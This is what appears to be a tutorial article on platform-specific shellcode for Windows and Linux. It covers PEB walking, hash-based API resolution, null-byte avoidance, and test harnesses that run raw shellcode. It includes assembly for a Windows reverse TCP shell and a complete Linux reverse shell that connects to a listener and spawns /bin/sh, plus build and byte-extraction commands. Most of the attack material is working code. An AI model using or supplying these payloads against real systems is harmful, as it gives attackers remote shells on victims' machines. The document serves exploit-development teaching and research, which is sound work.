Platform-Specific Shellcode Implementation

Exploit Development Advanced 📅 Published: 02/08/2025

Master Windows and Linux shellcode development: from PEB walking and API resolution to system calls and advanced platform-specific techniques.

Ethical Use Only: This advanced content is for authorized security research, penetration testing with explicit permission, and defensive security analysis. Never use these techniques on systems without proper authorization.

The Tale of Two Platforms

Developing shellcode for Windows versus Linux is like speaking two entirely different languages. While the core principles remain the same—position independence, null-byte avoidance, and self-containment—the implementation details are vastly different. This article will teach you to speak both languages fluently.

Linux offers a direct, stable system call interface. It's like having a clear, well-documented API that doesn't change. Windows, on the other hand, forces you to work through high-level libraries that can move around in memory, creating a more complex but ultimately more powerful environment once mastered.

Learning Approach: We'll start with the fundamentals of each platform, build complete working examples, then explore advanced techniques used by professional exploit developers and security researchers.

🔷 Windows Shellcode: The Art of Function Discovery

Windows shellcode development is significantly more complex than Linux because you must dynamically discover and resolve API functions at runtime. However, this complexity brings power—Windows API functions are incredibly feature-rich once you can access them.

The Challenge: No Stable System Calls

Unlike Linux, Windows doesn't provide a stable system call interface: system call numbers are undocumented and change between Windows builds. Shellcode therefore goes through the exported functions of system libraries such as kernel32.dll, and the core challenge is finding those functions in memory when ASLR has randomized their locations.

First, let's look at the "correct" way to create a process in C using the CreateProcessA function:


/* ANALYSIS: C-level example of process creation on Windows */
#include <windows.h>
#include <stdio.h>
int main(void) {
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));
    char commandLine[] = "notepad.exe";
    if (!CreateProcessA(NULL, commandLine, NULL, NULL, FALSE, 0, 
                       NULL, NULL, &si, &pi)) {
        printf("CreateProcess failed (%lu)\n", GetLastError()); /* GetLastError returns a DWORD */
        return 1;
    }
    printf("Process created successfully\n");
    // Wait for process to complete
    WaitForSingleObject(pi.hProcess, INFINITE);
    // Close handles
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return 0;
}
        

Notice the complexity involved. Now, let's see how shellcode achieves its goals differently.

Part 1: Finding kernel32.dll - The Key to the Kingdom

Nearly every critical Windows API function either lives in kernel32.dll or can be accessed through it (e.g., by using LoadLibraryA to load other DLLs). Our first task is to reliably find the base address of kernel32.dll in memory, regardless of ASLR (Address Space Layout Randomization).

The standard method is the PEB (Process Environment Block) Walk. Every process has a TEB (Thread Environment Block), which can be accessed via the FS register in 32-bit processes or the GS register in 64-bit processes. The TEB contains a pointer to the PEB, which in turn contains a wealth of information about the process, including a list of all loaded modules.

Here is the 32-bit assembly code to perform a PEB walk and retrieve the base address of kernel32.dll:


; find_kernel32.asm (32-bit)
; Out: EAX = kernel32.dll base address
find_kernel32:
    xor ecx, ecx                    ; Zero out ECX
    mov eax, [fs:ecx + 0x30]        ; EAX = Address of PEB (from TEB at FS:[0x30])
    mov eax, [eax + 0x0C]           ; EAX = PEB->Ldr
    mov eax, [eax + 0x14]           ; EAX = Ldr->InMemoryOrderModuleList.Flink (first entry: the executable)
    ; A robust implementation hashes each entry's BaseDllName to find kernel32.dll.
    ; For simplicity, this relies on kernel32.dll usually being the third module
    ; in the list, so we follow Flink twice from the first entry.
    mov eax, [eax]                  ; Second entry (ntdll.dll)
    mov eax, [eax]                  ; Third entry (kernel32.dll)
    mov eax, [eax + 0x10]           ; EAX = DllBase (offset 0x10 from InMemoryOrderLinks)
    ret
        
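Why it's reliable: The TEB and PEB layouts are fundamental to how Windows loads processes, so these offsets are stable across nearly all versions of Windows. The module order, by contrast, is a convention rather than a guarantee, which is why robust implementations compare module names instead of counting list entries.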

Part 2: Dynamic Function Resolution by Hash

Now that we have the base address of kernel32.dll, we need to find specific functions within it. We can't hardcode addresses because of ASLR, so we use a hashing technique:

  1. Pre-calculate hashes of the function names we need (e.g., LoadLibraryA, CreateProcessA)
  2. Walk through the DLL's export table
  3. Hash each name using the same algorithm
  4. Compare the runtime hash with our pre-calculated target hash
  5. If they match, retrieve the address of that function

Here is a simple but effective ROR13 hashing algorithm:


; A simple ROR13 hashing function
compute_hash:
    xor eax, eax                    ; Clear EAX to hold the hash
    xor edx, edx                    ; Clear EDX for the character
hash_loop:
    mov dl, [esi]                   ; Get the next character of the function name
    test dl, dl                     ; Check for null terminator
    jz hash_finished
    ror eax, 13                     ; Rotate the hash right by 13 bits
    add eax, edx                    ; Add the character to the hash
    inc esi                         ; Move to the next character
    jmp hash_loop
hash_finished:
    ret
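
The target hashes have to be pre-calculated offline with exactly the same algorithm the shellcode uses at runtime. The following is a minimal Python sketch of that step, assuming the rotate-then-add order of compute_hash above and ASCII export names; the helper names ror32 and ror13_hash are illustrative, not part of any library.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by `count` bits."""
    value &= 0xFFFFFFFF
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror13_hash(name: str) -> int:
    """Mirror compute_hash: rotate the hash right by 13, then add the character."""
    h = 0
    for ch in name.encode("ascii"):
        h = (ror32(h, 13) + ch) & 0xFFFFFFFF
    return h


if __name__ == "__main__":
    for api in ("LoadLibraryA", "MessageBoxA"):
        print(f"{api}: 0x{ror13_hash(api):08X}")
    # LoadLibraryA: 0xEC0E4E8E
    # MessageBoxA: 0xBC4DA2A8
```

Malware analysts use the same kind of table in reverse: hashing every export of a DLL and looking up the constants found in a sample. Note that other tools hash the module name together with the function name, so their constants differ from these.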
        

And here's the logic to find a function given a target hash:


; find_function_by_hash.asm
; In:  EBX = Base address of the target DLL
;      EDI = The pre-calculated hash of the function name we want
; Out: EAX = Address of the function
; Clobbers ECX, EDX, ESI. Assumes the export exists (no bounds check on the name count).
find_function:
    mov eax, [ebx + 0x3C]           ; EAX = Offset to PE Header ("PE\0\0")
    mov edx, [ebx + eax + 0x78]     ; EDX = RVA of Export Table
    add edx, ebx                    ; EDX = Address of Export Table
    xor ecx, ecx                    ; ECX = Loop counter / index
find_loop:
    mov esi, [edx + 0x20]           ; ESI = RVA of AddressOfNames
    add esi, ebx                    ; ESI = Address of AddressOfNames table
    mov esi, [esi + ecx * 4]        ; ESI = RVA of current function name
    add esi, ebx                    ; ESI = Address of current function name
    push edx                        ; compute_hash clobbers EDX, so preserve it
    call compute_hash               ; Hashes string at ESI, result in EAX
    pop edx
    cmp eax, edi                    ; Compare with our target hash
    je found_it
    inc ecx
    jmp find_loop
found_it:
    mov esi, [edx + 0x24]           ; ESI = RVA of AddressOfNameOrdinals
    add esi, ebx                    ; ESI = Address of AddressOfNameOrdinals table
    movzx ecx, word [esi + ecx * 2] ; ECX = Ordinal index of the function
    mov esi, [edx + 0x1C]           ; ESI = RVA of AddressOfFunctions
    add esi, ebx                    ; ESI = Address of AddressOfFunctions table
    mov eax, [esi + ecx * 4]        ; EAX = RVA of the function
    add eax, ebx                    ; EAX = Address of the function
    ret
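
The three-table indirection is the part that is easiest to get wrong: the index of a matching name selects an entry in the ordinal table, and that ordinal (not the name index) selects the function RVA. The sketch below models the lookup in Python with made-up data. The ExportDirectory class, the export names, and the RVAs are all hypothetical and only stand in for the real PE structures.

```python
from dataclasses import dataclass
from typing import List, Optional


def ror13_hash(name: str) -> int:
    """Rotate-right-by-13-then-add hash over the ASCII name."""
    h = 0
    for ch in name.encode("ascii"):
        h = (((h >> 13) | (h << 19)) & 0xFFFFFFFF) + ch
        h &= 0xFFFFFFFF
    return h


@dataclass
class ExportDirectory:
    names: List[str]          # stands in for AddressOfNames
    name_ordinals: List[int]  # stands in for AddressOfNameOrdinals
    functions: List[int]      # stands in for AddressOfFunctions (RVAs)


def resolve_by_hash(base: int, exports: ExportDirectory, target: int) -> Optional[int]:
    """Return base + RVA of the export whose name hashes to `target`, or None."""
    for index, name in enumerate(exports.names):
        if ror13_hash(name) == target:
            ordinal = exports.name_ordinals[index]  # name index -> ordinal
            return base + exports.functions[ordinal]  # ordinal -> function RVA
    return None


# Hypothetical module: the ordinal table deliberately is not the identity mapping.
demo = ExportDirectory(
    names=["Alpha", "Beta", "Gamma"],
    name_ordinals=[2, 0, 1],
    functions=[0x1100, 0x1200, 0x1000],
)

if __name__ == "__main__":
    address = resolve_by_hash(0x10000000, demo, ror13_hash("Beta"))
    print(hex(address))  # 0x10001100
```

Unlike the assembly loop, this version stops at the end of the name table and returns None when nothing matches.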
        

Part 3: Practical Examples

Example 1: MessageBoxA Shellcode

This is the "Hello, World!" of Windows shellcode. It's a safe way to test that your function resolution logic is working correctly. It requires loading user32.dll and finding MessageBoxA.

Execution Flow:

  1. Find kernel32.dll using a PEB walk
  2. Find the address of LoadLibraryA within kernel32.dll by hash
  3. Call LoadLibraryA with the string "user32.dll" to load the library
  4. The return value from LoadLibraryA is the base address of user32.dll
  5. Find the address of MessageBoxA within user32.dll by hash
  6. Push the arguments for MessageBoxA onto the stack
  7. Call the resolved MessageBoxA address
  8. Find and call ExitProcess to terminate cleanly

; MessageBoxA Shellcode (Conceptual: the push immediates still contain null bytes)
_start:
    ; --- Find kernel32.dll base ---
    call find_kernel32              ; Result: EAX = kernel32.dll base address
    mov ebx, eax                    ; EBX = DLL base expected by find_function
    mov ebp, eax                    ; Keep kernel32 base for the ExitProcess lookup
    ; --- Find LoadLibraryA ---
    mov edi, 0xEC0E4E8E             ; ROR13 hash of "LoadLibraryA"
    call find_function              ; Result: EAX = LoadLibraryA address
    ; --- Load user32.dll ---
    push 0x00006c6c                 ; Push "ll\0\0" (last chunk first)
    push 0x642e3233                 ; Push "32.d"
    push 0x72657375                 ; Push "user" -> "user32.dll"
    push esp                        ; lpLibFileName = pointer to the string
    call eax                        ; Call LoadLibraryA("user32.dll")
    mov ebx, eax                    ; EBX = user32.dll base address
    ; --- Find MessageBoxA ---
    mov edi, 0xBC4DA2A8             ; ROR13 hash of "MessageBoxA"
    call find_function              ; Result: EAX = MessageBoxA address
    ; --- Prepare strings ---
    ; "Hello World!" message
    push 0x00000000                 ; Null terminator
    push 0x21646c72                 ; Push "rld!"
    push 0x6f57206f                 ; Push "o Wo"
    push 0x6c6c6548                 ; Push "Hell" -> "Hello World!"
    mov esi, esp                    ; ESI = pointer to the message
    ; "Great Binary" title
    push 0x00000000                 ; Null terminator
    push 0x7972616e                 ; Push "nary"
    push 0x69422074                 ; Push "t Bi"
    push 0x61657247                 ; Push "Grea" -> "Great Binary"
    mov ecx, esp                    ; ECX = pointer to the title
    ; --- Call MessageBoxA ---
    push 0x00000000                 ; uType = MB_OK
    push ecx                        ; lpCaption = "Great Binary"
    push esi                        ; lpText = "Hello World!"
    push 0x00000000                 ; hWnd = NULL
    call eax                        ; Call MessageBoxA
    ; --- Find and call ExitProcess ---
    mov ebx, ebp                    ; Back to the kernel32 base (EBP survives API calls)
    mov edi, 0x73E2D87E             ; ROR13 hash of "ExitProcess"
    call find_function              ; Find ExitProcess in kernel32
    push 0x00000000                 ; Exit code = 0
    call eax                        ; Call ExitProcess(0)
        

Example 2: Windows Reverse TCP Shell

This creates a TCP connection back to an attacker and redirects a command shell through it. This demonstrates the full complexity of Windows shellcode:


; Windows Reverse Shell (High-level flow)
_start:
    ; 1. Find kernel32.dll base address via PEB walk
    call find_kernel32
    mov esi, eax                    ; Save kernel32 base in ESI
    ; 2. Find LoadLibraryA in kernel32.dll  
    mov edi, 0xEC0E4E8E             ; ROR13 hash of "LoadLibraryA"
    call find_function_by_hash
    mov [load_library], eax
    ; 3. Load ws2_32.dll for networking functions
    push 0x00006c6c                ; "ll\0\0"
    push 0x642e3233                ; "32.d"
    push 0x5f327377                 ; "ws2_" -> "ws2_32.dll"
    mov eax, esp
    push eax
    call [load_library]
    mov edi, eax                    ; Save ws2_32 base in EDI
    ; 4. Resolve networking functions (WSAStartup, WSASocketA, connect)
    ; ... (function resolution code) ...
    ; 5. Initialize Winsock
    sub esp, 0x190                  ; Allocate space for WSADATA
    push esp                        ; lpWSAData
    push 0x0202                     ; wVersionRequested (2.2)
    call [wsa_startup]
    ; 6. Create socket
    push 0x00000000                ; dwFlags
    push 0x00000000                ; g
    push 0x00000000                ; lpProtocolInfo
    push 0x00000006                ; protocol (TCP)
    push 0x00000001                ; type (SOCK_STREAM)
    push 0x00000002                ; af (AF_INET)
    call [wsa_socket]
    mov esi, eax                    ; Save socket in ESI
    ; 7. Set up sockaddr_in structure
    push 0x0100007f                ; sin_addr (127.0.0.1 in little endian)
    push 0x5c110002                ; sin_port (4444) + sin_family (AF_INET)
    mov edi, esp                    ; EDI points to sockaddr_in
    ; 8. Connect to attacker
    push 0x00000010                ; namelen (sizeof sockaddr_in)
    push edi                        ; name (sockaddr_in)
    push esi                        ; s (socket)
    call [connect]
    ; 9. Redirect STDIN, STDOUT, STDERR to socket
    push esi                        ; hTemplateFile (socket)
    push 0x00000000                ; dwFlagsAndAttributes  
    push 0x00000003                ; dwCreationDisposition (OPEN_EXISTING)
    push 0x00000000                ; lpSecurityAttributes
    push 0x00000000                ; dwShareMode
    push 0x40000000                ; dwDesiredAccess (GENERIC_WRITE)
    call [create_file]
    ; 10. Set up STARTUPINFO for CreateProcessA
    ; ... (structure setup) ...
    ; 11. Launch cmd.exe with redirected I/O
    push [process_info]             ; lpProcessInformation
    push [startup_info]             ; lpStartupInfo
    push 0x00000000                ; lpCurrentDirectory
    push 0x00000000                ; lpEnvironment
    push 0x00000000                ; dwCreationFlags
    push 0x00000001                ; bInheritHandles
    push 0x00000000                ; lpThreadAttributes
    push 0x00000000                ; lpProcessAttributes
    push [cmd_string]               ; lpCommandLine ("cmd.exe")
    push 0x00000000                ; lpApplicationName
    call [create_process]
    ; 12. Wait for process to exit
    push 0xFFFFFFFF                ; dwMilliseconds (INFINITE)
    push [process_handle]           ; hHandle
    call [wait_for_single_object]
    ; 13. Clean up and exit
    call [exit_process]
        

This creates a fully interactive remote shell, demonstrating the power and complexity of Windows shellcode.

🔶 Linux Shellcode: The Art of Simplicity

Linux shellcode development is refreshingly direct compared to Windows. Linux offers a stable system call interface that doesn't change between versions, allowing you to request services directly from the kernel without hunting for library functions.

The Linux Advantage: Direct System Calls

Because the kernel interface is stable, a system call number and a handful of registers are all you need. The fundamental pattern for executing a command in a Linux shell involves three key calls: fork(), execve(), and waitpid().

This C code demonstrates a rudimentary shell that implements this exact pattern:


/*
ANALYSIS:
LANGUAGE: C
GOAL: A simple shell demonstrating the fork/execve/waitpid pattern.
STATUS: Runnable
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/wait.h>
#define MAX_COMMAND_LENGTH 1024
#define MAX_ARGS 64
int main(void) {
    char command[MAX_COMMAND_LENGTH];
    char *args[MAX_ARGS];
    pid_t pid;
    int status;
    while (1) {
        printf("$ "); 
        if (fgets(command, sizeof(command), stdin) == NULL) { break; }
        command[strcspn(command, "\n")] = 0; // Remove newline
        if (strcmp(command, "exit") == 0) { break; }
        // Parse command into arguments
        int argc = 0;
        char *token = strtok(command, " ");
        while (token != NULL && argc < MAX_ARGS - 1) {
            args[argc++] = token;
            token = strtok(NULL, " ");
        }
        args[argc] = NULL;
        if (argc > 0) {
            pid = fork();
            if (pid == 0) {
                // Child process: execute the command
                execvp(args[0], args);
                perror("execvp failed");
                exit(1);
            } else if (pid > 0) {
                // Parent process: wait for child
                waitpid(pid, &status, 0);
            } else {
                perror("fork failed");
            }
        }
    }
    return 0;
}
        

From C to execve Shellcode

Let's do a complete, hands-on tutorial to convert a simple C program into null-free assembly shellcode. Our goal is a program that executes /bin/sh.

Step 1: The C Program


#include <unistd.h>
int main() {
    execve("/bin/sh", NULL, NULL);
    return 0;
}
        

Step 2: First Assembly Attempt (with null-byte flaws)

We translate this to assembly using the execve system call (number 59 on x86-64). This version is logically correct but contains null bytes, making it unsuitable for most exploits.


; ANALYSIS:
; LANGUAGE: Assembly (NASM, 64-bit)
; STATUS: Broken (Contains null bytes)
; GOAL: execve("/bin/sh", NULL, NULL) 
section .text
global _start
_start:
    ; Set up execve system call (BROKEN VERSION)
    mov rax, 59                     ; execve system call number (contains nulls!)
    lea rdi, [rel binsh]            ; First argument: pointer to "/bin/sh"
    xor rsi, rsi                    ; Second argument: argv = NULL
    xor rdx, rdx                    ; Third argument: envp = NULL
    syscall                         ; Make the system call
section .data
    binsh: db '/bin/sh', 0          ; Null-terminated string (contains null!)
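
To see where the null bytes come from, it helps to scan the assembled bytes rather than the source. The sketch below is a small Python checker; find_bad_bytes is a hypothetical helper name, and the byte strings are the standard x86-64 encodings of the instructions named in the comments (an assembler may pick either of the first two forms for mov rax, 59).

```python
from typing import List


def find_bad_bytes(code: bytes, bad: bytes = b"\x00") -> List[int]:
    """Return the offsets of every byte in `code` that appears in `bad`."""
    return [offset for offset, value in enumerate(code) if value in bad]


# mov eax, 59 -> B8 3B 00 00 00 (32-bit immediate is zero-padded)
MOV_EAX_59 = bytes.fromhex("b83b000000")
# mov rax, 59 -> 48 C7 C0 3B 00 00 00 (REX.W form, same padding problem)
MOV_RAX_59 = bytes.fromhex("48c7c03b000000")
# mov al, 59  -> B0 3B (8-bit immediate, no padding)
MOV_AL_59 = bytes.fromhex("b03b")

if __name__ == "__main__":
    print(find_bad_bytes(MOV_EAX_59))  # [2, 3, 4]
    print(find_bad_bytes(MOV_RAX_59))  # [4, 5, 6]
    print(find_bad_bytes(MOV_AL_59))   # []
```

The `bad` parameter can be widened for targets that also reject bytes such as newline or carriage return, for example `bad=b"\x00\x0a\x0d"`.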
        

Step 3: The Null-Free Solution

Here's a version that avoids null bytes entirely:


; ANALYSIS:
; LANGUAGE: Assembly (NASM, 64-bit)
; GOAL: A null-free version of execve("/bin/sh", NULL, NULL)
; TECHNIQUES: Stack string construction, register manipulation
section .text
global _start
_start:
    ; Clear registers without using null bytes
    xor rax, rax                    ; Zero out RAX
    xor rsi, rsi                    ; argv = NULL
    xor rdx, rdx                    ; envp = NULL
    ; Build "/bin/sh" string on the stack
    push rdx                        ; Push null terminator
    mov rbx, 0x68732f6e69622f2f     ; "//bin/sh" as a little-endian qword (the extra slash pads it to 8 bytes)
    push rbx                        ; Push string onto stack
    mov rdi, rsp                    ; RDI points to our string
    ; Set up system call number without null bytes
    mov al, 59                      ; execve system call (only affects lower 8 bits)
    ; Make the system call
    syscall                         ; Execute /bin/sh
        
Key Techniques: We use mov al, 59 instead of mov rax, 59 to avoid null bytes, and build the string on the stack instead of using a data section.
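
Working out stack-string immediates by hand is error-prone, because each chunk is byte-reversed by the little-endian load and the chunks themselves are pushed last-first. A minimal Python sketch of the conversion follows; stack_pushes is a hypothetical helper, and padding with zero bytes is an assumption that suits conceptual listings but reintroduces nulls (padding the path with an extra slash, as above, avoids that).

```python
import struct
from typing import List


def stack_pushes(text: bytes, word_size: int = 8, pad: bytes = b"\x00") -> List[int]:
    """Return the immediates to push, in push order, so `text` ends up at the stack top."""
    if word_size not in (4, 8):
        raise ValueError("word_size must be 4 or 8")
    remainder = len(text) % word_size
    if remainder:
        text += pad * (word_size - remainder)  # pad the final chunk to a full word
    fmt = "<I" if word_size == 4 else "<Q"
    chunks = [text[i:i + word_size] for i in range(0, len(text), word_size)]
    # The stack grows downward, so the last chunk of the string is pushed first.
    return [struct.unpack(fmt, chunk)[0] for chunk in reversed(chunks)]


if __name__ == "__main__":
    print([hex(v) for v in stack_pushes(b"//bin/sh")])
    # ['0x68732f6e69622f2f']
    print([hex(v) for v in stack_pushes(b"user32.dll", word_size=4)])
    # ['0x6c6c', '0x642e3233', '0x72657375']
```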

Advanced Linux Examples

Linux Reverse Shell

Here's a Linux reverse shell that connects back to a listener on 127.0.0.1:4444 and spawns /bin/sh:


; Linux Reverse Shell Shellcode
; Connects to 127.0.0.1:4444 and spawns /bin/sh
section .text
global _start
_start:
    ; Clear registers (also helps avoid null bytes)
    xor rax, rax
    xor rbx, rbx
    xor rcx, rcx
    xor rdx, rdx
    ; Step 1: Create a socket
    ; socket(AF_INET, SOCK_STREAM, 0)
    mov al, 41                      ; sys_socket
    mov bl, 2                       ; AF_INET
    mov cl, 1                       ; SOCK_STREAM
    cdq                            ; RDX = 0 (protocol)
    syscall
    mov rdi, rax                    ; Save socket fd in RDI
    ; Step 2: Connect to attacker
    ; connect(sockfd, &addr, sizeof(addr))
    ; Build sockaddr_in structure on stack
    xor rax, rax
    push rax                        ; Padding
    ; sin_addr = 127.0.0.1 (0x0100007f in little endian)
    mov dword [rsp-4], 0x0100007f   
    ; sin_port = 4444 (0x115c in big endian) + sin_family = AF_INET (2)
    mov word [rsp-6], 0x5c11        ; Port 4444 in network byte order
    mov word [rsp-8], 0x0002        ; AF_INET
    sub rsp, 8                      ; Adjust stack pointer
    mov rsi, rsp                    ; RSI points to sockaddr_in
    mov al, 42                      ; sys_connect
    mov dl, 16                      ; sizeof(sockaddr_in)
    syscall
    ; Step 3: Redirect STDIN, STDOUT, STDERR
    ; dup2(sockfd, 0), dup2(sockfd, 1), dup2(sockfd, 2)
    mov rbx, rdi                    ; RBX = socket fd
    xor rcx, rcx                    ; Counter for dup2 loop
dup_loop:
    mov al, 33                      ; sys_dup2
    mov rdi, rbx                    ; oldfd (socket)
    mov rsi, rcx                    ; newfd (0, 1, 2)
    syscall
    inc rcx
    cmp cl, 3
    jl dup_loop
    ; Step 4: Execute /bin/sh
    ; execve("/bin/sh", NULL, NULL)
    xor rax, rax
    push rax                        ; Null terminator
    ; Push "/bin/sh" onto stack
    mov rbx, 0x68732f6e69622f2f     ; "//bin/sh" in reverse
    push rbx
    mov rdi, rsp                    ; RDI points to "/bin/sh"
    xor rsi, rsi                    ; argv = NULL
    xor rdx, rdx                    ; envp = NULL
    mov al, 59                      ; sys_execve
    syscall
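
The port and address constants in the listing look odd because the structure is stored in network byte order while the immediates are written as little-endian words. The Python sketch below builds the same 16-byte sockaddr_in and reads it back the way the assembly sees it. The function name sockaddr_in_bytes is hypothetical, and the layout assumed is the usual Linux one (2-byte family, 2-byte port, 4-byte address, 8 bytes of padding).

```python
import socket
import struct


def sockaddr_in_bytes(ip: str, port: int) -> bytes:
    """Pack a Linux-style sockaddr_in: family, port, address, 8 bytes of padding."""
    family = struct.pack("<H", int(socket.AF_INET))  # host order on x86 (little-endian)
    port_be = struct.pack(">H", port)                # network byte order (big-endian)
    addr = socket.inet_aton(ip)                      # already in network byte order
    return family + port_be + addr + b"\x00" * 8


if __name__ == "__main__":
    raw = sockaddr_in_bytes("127.0.0.1", 4444)
    print(raw.hex())  # 0200115c7f0000010000000000000000
    # Values as they appear when written as little-endian immediates:
    print(hex(struct.unpack("<H", raw[2:4])[0]))  # 0x5c11
    print(hex(struct.unpack("<I", raw[4:8])[0]))  # 0x100007f
```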
        

Building and Testing Linux Shellcode


# Build the shellcode
nasm -f elf64 reverse_shell.asm -o reverse_shell.o
ld reverse_shell.o -o reverse_shell
# Extract raw bytes
objdump -d reverse_shell | grep "^ " | cut -f2 | tr -d ' ' | tr -d '\n'
# Create test harness
echo 'unsigned char shellcode[] = "\x48\x31\xc0\x48\x31\xdb...";' > test.c
        

Platform Comparison: Key Differences

Aspect | Windows | Linux
System Calls | Unstable, undocumented, use APIs instead | Stable, documented, direct usage
Function Resolution | PEB walk + hash-based API resolution | Direct system call numbers
Complexity | High (hundreds of bytes typical) | Low (dozens of bytes possible)
String Handling | Stack construction + UTF-16 considerations | Simple stack construction
Process Creation | CreateProcessA with complex structures | Simple execve system call
Networking | WinSock API (WSASocket, etc.) | Berkeley sockets (socket, connect, etc.)

Strategic Insight: Windows shellcode requires more upfront investment to learn but provides access to incredibly powerful APIs. Linux shellcode is faster to develop and typically more compact, making it ideal for size-constrained scenarios.

Testing Your Shellcode

Windows Test Harness

The best way to test is with a simple C/C++ "harness" that allocates a block of executable memory, copies your shellcode into it, and executes it.


// windows_harness.c
#include <windows.h>
#include <stdio.h>
#include <string.h>   // memcpy
// Paste your shellcode bytes here
unsigned char shellcode[] = "\x90\x90\x90...";
int main() {
    printf("Shellcode length: %zu bytes\n", sizeof(shellcode) - 1);
    // Allocate memory with Read, Write, and Execute permissions
    void *exec_mem = VirtualAlloc(NULL, sizeof(shellcode), 
                                 MEM_COMMIT | MEM_RESERVE, 
                                 PAGE_EXECUTE_READWRITE);
    if (exec_mem == NULL) {
        printf("VirtualAlloc failed: %lu\n", GetLastError());
        return 1;
    }
    // Copy shellcode to executable memory
    memcpy(exec_mem, shellcode, sizeof(shellcode));
    printf("Executing shellcode at address: %p\n", exec_mem);
    // Execute shellcode
    ((void (*)())exec_mem)();
    // Clean up (this may never be reached)
    VirtualFree(exec_mem, 0, MEM_RELEASE);
    return 0;
}
        

Linux Test Harness


// linux_harness.c
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>
// Your shellcode bytes here
unsigned char shellcode[] = "\x48\x31\xc0\x50...";
int main() {
    printf("Shellcode length: %zu bytes\n", sizeof(shellcode) - 1);
    // Allocate executable memory
    void *exec_mem = mmap(NULL, sizeof(shellcode), 
                         PROT_READ | PROT_WRITE | PROT_EXEC,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (exec_mem == MAP_FAILED) {
        perror("mmap failed");
        return 1;
    }
    // Copy shellcode
    memcpy(exec_mem, shellcode, sizeof(shellcode));
    printf("Executing shellcode...\n");
    // Execute
    ((void (*)())exec_mem)();
    // Clean up (may not be reached)
    munmap(exec_mem, sizeof(shellcode));
    return 0;
}
        

Cross-Platform Development Script

Here's a Python script that extracts the bytes from a binary with objdump and compiles the matching test harness for the host platform:


#!/usr/bin/env python3
"""
Cross-platform shellcode testing framework
Supports both Windows and Linux shellcode development
"""
import os
import sys
import subprocess
import tempfile
import platform
def create_test_harness(shellcode_bytes, target_os="linux"):
    """Create platform-specific test harness."""
    if target_os.lower() == "windows":
        template = '''
#include <windows.h>
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = "{shellcode}";
int main() {{
    void *exec_mem = VirtualAlloc(NULL, sizeof(shellcode), 
                                 MEM_COMMIT | MEM_RESERVE, 
                                 PAGE_EXECUTE_READWRITE);
    if (!exec_mem) return 1;
    memcpy(exec_mem, shellcode, sizeof(shellcode));
    ((void (*)())exec_mem)();
    VirtualFree(exec_mem, 0, MEM_RELEASE);
    return 0;
}}
'''
    else:  # Linux
        template = '''
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
unsigned char shellcode[] = "{shellcode}";
int main() {{
    void *exec_mem = mmap(NULL, sizeof(shellcode), 
                         PROT_READ | PROT_WRITE | PROT_EXEC,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (exec_mem == MAP_FAILED) return 1;
    memcpy(exec_mem, shellcode, sizeof(shellcode));
    ((void (*)())exec_mem)();
    munmap(exec_mem, sizeof(shellcode));
    return 0;
}}
'''
    return template.format(shellcode=shellcode_bytes)
def test_shellcode(binary_path):
    """Extract and test shellcode from binary."""
    # Extract bytes using objdump
    try:
        result = subprocess.run(['objdump', '-d', binary_path], 
                              capture_output=True, text=True)
        # Parse objdump output to extract bytes
        bytes_list = []
        for line in result.stdout.split('\n'):
            if ':' in line and '\t' in line:
                # Extract hex bytes from objdump format
                parts = line.split('\t')
                if len(parts) >= 2:
                    hex_part = parts[1].strip()
                    # Remove spaces and convert to \x format
                    hex_bytes = hex_part.replace(' ', '')
                    for i in range(0, len(hex_bytes), 2):
                        if i + 1 < len(hex_bytes):
                            bytes_list.append(f"\\x{hex_bytes[i:i+2]}")
        shellcode_string = ''.join(bytes_list)
        print(f"Extracted shellcode: {shellcode_string}")
        # Create test harness
        target_os = "windows" if platform.system() == "Windows" else "linux"
        harness_code = create_test_harness(shellcode_string, target_os)
        # Write and compile
        with tempfile.NamedTemporaryFile(mode='w', suffix='.c', delete=False) as f:
            f.write(harness_code)
            harness_path = f.name
        # Compile
        if target_os == "windows":
            compile_cmd = ['gcc', '-o', harness_path + '.exe', harness_path]
        else:
            compile_cmd = ['gcc', '-z', 'execstack', '-o', harness_path + '.out', harness_path]
        subprocess.run(compile_cmd, check=True)
        print("Test harness compiled successfully!")
        return harness_path + ('.exe' if target_os == "windows" else '.out')
    except Exception as e:
        print(f"Error: {e}")
        return None
if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 test_shellcode.py <binary_path>")
        sys.exit(1)
    binary_path = sys.argv[1]
    test_executable = test_shellcode(binary_path)
    if test_executable:
        print(f"Test executable created: {test_executable}")
        print("Run it to test your shellcode!")
        

Advanced Platform-Specific Techniques

Windows Advanced: 64-bit Considerations

64-bit Windows shellcode requires different techniques:

  • Different Registers: Use GS:[0x60] instead of FS:[0x30] for PEB access
  • Different Calling Convention: The Microsoft x64 convention passes the first four integer arguments in RCX, RDX, R8, and R9
  • Shadow Space: The caller must reserve 32 bytes of shadow space on the stack and keep RSP 16-byte aligned at each call
  • Different Structures: PEB and TEB layouts differ in 64-bit

; 64-bit Windows PEB Walk
find_kernel32_x64:
    xor rax, rax
    mov rax, [gs:rax + 0x60]        ; 64-bit PEB offset
    mov rax, [rax + 0x18]           ; PEB->Ldr  
    mov rax, [rax + 0x20]           ; InMemoryOrderModuleList.Flink (first entry: the executable)
    mov rax, [rax]                  ; Second entry (ntdll.dll)
    mov rax, [rax]                  ; Third entry (kernel32.dll)
    mov rax, [rax + 0x20]           ; DllBase (offset 0x20 from InMemoryOrderLinks in 64-bit)
    ret
        

Linux Advanced: System Call Variations

Different Linux architectures use different system call mechanisms:


; x86-64 system calls (modern)
mov rax, 59        ; execve
syscall            ; Use syscall instruction
; i386 system calls (legacy)  
mov eax, 11        ; execve (different number!)
int 0x80           ; Use interrupt
; ARM system calls
mov r7, #11        ; execve  
svc #0             ; Supervisor call
        
Pro Tip: Always check the target architecture's system call numbers and calling conventions. The numbers are stable within one architecture but differ between architectures: execve is 59 on x86-64 and 11 on both i386 and 32-bit ARM.

Mastery Achieved: What's Next?

